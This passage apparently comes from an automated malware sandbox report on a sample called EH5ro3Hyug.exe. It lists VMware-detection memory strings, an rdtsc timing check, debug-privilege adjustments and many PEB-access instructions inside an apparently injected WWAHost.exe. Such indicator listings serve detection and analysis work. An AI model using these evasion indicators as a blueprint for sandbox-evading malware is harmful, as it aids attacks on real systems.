            Source: explorer.exe, 00000007.00000000.712515284.0000000004791000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.704956994.000000000A868000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.717364088.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.790011664.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.717364088.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.712354446.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000007.00000000.717543897.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000007.00000000.717543897.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: EH5ro3Hyug.exe, 00000000.00000002.689143123.0000000002BF1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_00409AA0 rdtsc
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B78794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B71B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B71B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C2138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C35BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B64F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B93B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B93B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C2131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B776E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B916E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B936CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B83A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B98E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B78A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BF4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C1FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B935A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C18DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BF41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BEA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B87D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C214FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B658EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
